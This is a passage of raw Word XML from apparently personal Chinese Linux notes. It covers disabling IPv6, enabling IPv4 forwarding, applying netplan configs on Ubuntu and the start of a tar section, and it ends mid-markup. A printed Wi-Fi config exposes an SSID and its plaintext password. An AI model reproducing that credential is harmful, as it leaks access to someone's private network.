      </w:pPr>
    </w:p>
    <w:p w14:paraId="14AC91DF" w14:textId="01DAF838" w:rsidR="00980FD2" w:rsidRDefault="008407ED" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="213" w:name="_Toc159779673"/>
      <w:r w:rsidRPr="008407ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="008407ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭</w:t>
      </w:r>
      <w:r w:rsidRPr="008407ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IPv6</w:t>
      </w:r>
      <w:r w:rsidRPr="008407ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r w:rsidRPr="008407ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IPv4 Forward</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213"/>
    </w:p>
    <w:p w14:paraId="22AD8176" w14:textId="3844485C" w:rsidR="008407ED" w:rsidRDefault="008407ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C278FF5" w14:textId="5FE98DAC" w:rsidR="008407ED" w:rsidRDefault="008407ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008407ED">
        <w:t>https://blog.csdn.net/lizongti/article/details/102758090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC89DD5" w14:textId="77777777" w:rsidR="008407ED" w:rsidRDefault="008407ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D352B0B" w14:textId="77777777" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="214" w:name="_Toc159779674"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IPv6</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214"/>
    </w:p>
    <w:p w14:paraId="339EC4CC" w14:textId="77777777" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004129B3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vi /etc/sysctl.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658B6694" w14:textId="77777777" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B35A181" w14:textId="6CF09B86" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加以下内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1381A21D" w14:textId="77777777" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F34FA9D" w14:textId="77777777" w:rsidR="004129B3" w:rsidRPr="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004129B3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>net.ipv6.conf.all.disable_ipv6 = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7F4F32" w14:textId="77777777" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004129B3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>net.ipv6.conf.default.disable_ipv6 = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8B9740" w14:textId="77777777" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49FD1083" w14:textId="2FEB2232" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭特定网卡</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6F4942" w14:textId="77777777" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245A3063" w14:textId="77777777" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC646E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>net.ipv6.conf.enp0s3.disable_ipv6 = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FEFD6A" w14:textId="76E0343F" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B4C8EDD" w14:textId="77777777" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行以下命令生效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4311BFCD" w14:textId="77777777" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AF7FDB5" w14:textId="77777777" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC646E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sysctl -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CCC140" w14:textId="12414129" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="681E8C70" w14:textId="77777777" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="215" w:name="_Toc159779675"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IPv4 Forward</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215"/>
    </w:p>
    <w:p w14:paraId="76FE9CDF" w14:textId="77777777" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003D3272">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vi /etc/sysctl.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D4FE57" w14:textId="12162B7F" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="262E15AA" w14:textId="77777777" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加以下内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5101EE3A" w14:textId="77777777" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="521D0E3F" w14:textId="77777777" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003D3272">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>net.ipv4.ip_forward=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB8654C" w14:textId="778F6AB8" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="108F0C3F" w14:textId="53FE0EE7" w:rsidR="004129B3" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行以下命令生效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E8C474" w14:textId="03A5B720" w:rsidR="008407ED" w:rsidRDefault="004129B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003D3272">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sysctl -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEEB7B2" w14:textId="77777777" w:rsidR="008407ED" w:rsidRDefault="008407ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BAAEF75" w14:textId="01EFF152" w:rsidR="00463312" w:rsidRDefault="00463312" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="216" w:name="_Toc159779676"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重启网络：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>etplan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="216"/>
    </w:p>
    <w:p w14:paraId="09126C33" w14:textId="295194D9" w:rsidR="00463312" w:rsidRDefault="00463312" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C81410" w14:textId="08A3BE77" w:rsidR="00063F99" w:rsidRDefault="00063F99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>centos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rhel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>喜欢用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Net</w:t>
      </w:r>
      <w:r>
        <w:t>workManager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="008C3903">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>但是</w:t>
      </w:r>
      <w:r w:rsidRPr="008C3903">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="008C3903">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>没用这一套</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">systemctl restart NetworkManager      service network restart </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行不通</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCEA2A4" w14:textId="6E422506" w:rsidR="00063F99" w:rsidRDefault="00063F99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A9340E6" w14:textId="65A4FD57" w:rsidR="00063F99" w:rsidRDefault="00063F99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>netplan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3042193E" w14:textId="77777777" w:rsidR="00063F99" w:rsidRDefault="00063F99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2761EFFC" w14:textId="2FE2C2A2" w:rsidR="00063F99" w:rsidRDefault="00063F99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>/etc/netplan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下是俩网卡的配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF51CCE" w14:textId="77777777" w:rsidR="00063F99" w:rsidRDefault="00063F99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>root@syj-ubuntu:/etc/netplan# ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653D887A" w14:textId="385EDDA2" w:rsidR="005E2716" w:rsidRDefault="00063F99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>00-installer-config-wifi.yaml  00-installer-config.yaml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7418366A" w14:textId="77777777" w:rsidR="00463312" w:rsidRDefault="00463312" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70EF0B6E" w14:textId="061B7E51" w:rsidR="00463312" w:rsidRDefault="00063F99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B25FE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00B25FE1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>etplan apply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以应用配置文件到网卡上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309E1067" w14:textId="77777777" w:rsidR="00463312" w:rsidRDefault="00463312" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FDABBAA" w14:textId="77777777" w:rsidR="000948E0" w:rsidRDefault="000948E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@syj-ubuntu:/etc/netplan# </w:t>
      </w:r>
      <w:r w:rsidRPr="000948E0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cat 00-installer-config.yaml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555E1AA9" w14:textId="77777777" w:rsidR="000948E0" w:rsidRPr="000948E0" w:rsidRDefault="000948E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000948E0">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># This is the network config written by 'subiquity'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16319E30" w14:textId="77777777" w:rsidR="000948E0" w:rsidRPr="000948E0" w:rsidRDefault="000948E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000948E0">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088E5448" w14:textId="77777777" w:rsidR="000948E0" w:rsidRPr="000948E0" w:rsidRDefault="000948E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000948E0">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  ethernets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57441483" w14:textId="77777777" w:rsidR="000948E0" w:rsidRPr="000948E0" w:rsidRDefault="000948E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000948E0">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    enp8s0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D3D4EE" w14:textId="77777777" w:rsidR="000948E0" w:rsidRPr="000948E0" w:rsidRDefault="000948E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000948E0">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">      dhcp4: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4257EBAF" w14:textId="7E9CAB83" w:rsidR="00463312" w:rsidRDefault="000948E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000948E0">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  version: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5500C3" w14:textId="22B9CED0" w:rsidR="000948E0" w:rsidRPr="008E1111" w:rsidRDefault="008E1111" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E1111">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>SSID</w:t>
      </w:r>
      <w:r w:rsidRPr="008E1111">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的名字不要被引号包裹！密码可以被引号包裹！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B30F4CB" w14:textId="77777777" w:rsidR="00A83846" w:rsidRDefault="00A83846" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@syj-ubuntu:/etc/netplan# </w:t>
      </w:r>
      <w:r w:rsidRPr="00A83846">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cat 00-installer-config-wifi.yaml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302BF13B" w14:textId="77777777" w:rsidR="00A83846" w:rsidRPr="00A83846" w:rsidRDefault="00A83846" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A83846">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># This is the network config written by 'subiquity'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D223FA" w14:textId="77777777" w:rsidR="00A83846" w:rsidRPr="00A83846" w:rsidRDefault="00A83846" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A83846">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BAE27F" w14:textId="77777777" w:rsidR="00A83846" w:rsidRPr="00A83846" w:rsidRDefault="00A83846" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A83846">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#  version: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748FF036" w14:textId="77777777" w:rsidR="00A83846" w:rsidRPr="00A83846" w:rsidRDefault="00A83846" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A83846">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#  wifis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FF2BCC" w14:textId="77777777" w:rsidR="00A83846" w:rsidRPr="00A83846" w:rsidRDefault="00A83846" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A83846">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#    wlx983f9f1908ad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68400567" w14:textId="77777777" w:rsidR="00A83846" w:rsidRPr="00A83846" w:rsidRDefault="00A83846" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A83846">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#      access-points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1C2784" w14:textId="77777777" w:rsidR="00A83846" w:rsidRPr="00A83846" w:rsidRDefault="00A83846" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A83846">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#        BLKJ_H3C:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0224F0C3" w14:textId="77777777" w:rsidR="00A83846" w:rsidRPr="00A83846" w:rsidRDefault="00A83846" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A83846">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#          password: blkj123qwe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DB7A43" w14:textId="5E351B6A" w:rsidR="000948E0" w:rsidRDefault="00A83846" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A83846">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#      dhcp4: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6499A04F" w14:textId="74A7EC8F" w:rsidR="000948E0" w:rsidRDefault="000948E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="692B1F6F" w14:textId="3661DE56" w:rsidR="000948E0" w:rsidRDefault="000948E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="639B4A21" w14:textId="77777777" w:rsidR="000948E0" w:rsidRDefault="000948E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A9CA65" w14:textId="02320BCD" w:rsidR="00F72473" w:rsidRDefault="00113932" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="217" w:name="_Toc159779677"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>压缩包操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="217"/>
    </w:p>
    <w:p w14:paraId="54FB7643" w14:textId="4DF4CA6C" w:rsidR="00113932" w:rsidRDefault="00113932" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43067929" w14:textId="11B45382" w:rsidR="00113932" w:rsidRPr="00113932" w:rsidRDefault="00E759DF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="218" w:name="_Toc159779678"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>ar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的压缩与解压缩</w:t>
      </w:r>
      <w:bookmarkEnd w:id="218"/>
    </w:p>
    <w:p w14:paraId="0502839D" w14:textId="6BC1BFF8" w:rsidR="00F72473" w:rsidRDefault="00F72473" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02EE7326" w14:textId="106906F0" w:rsidR="00503A5B" w:rsidRDefault="00B63C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是有的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
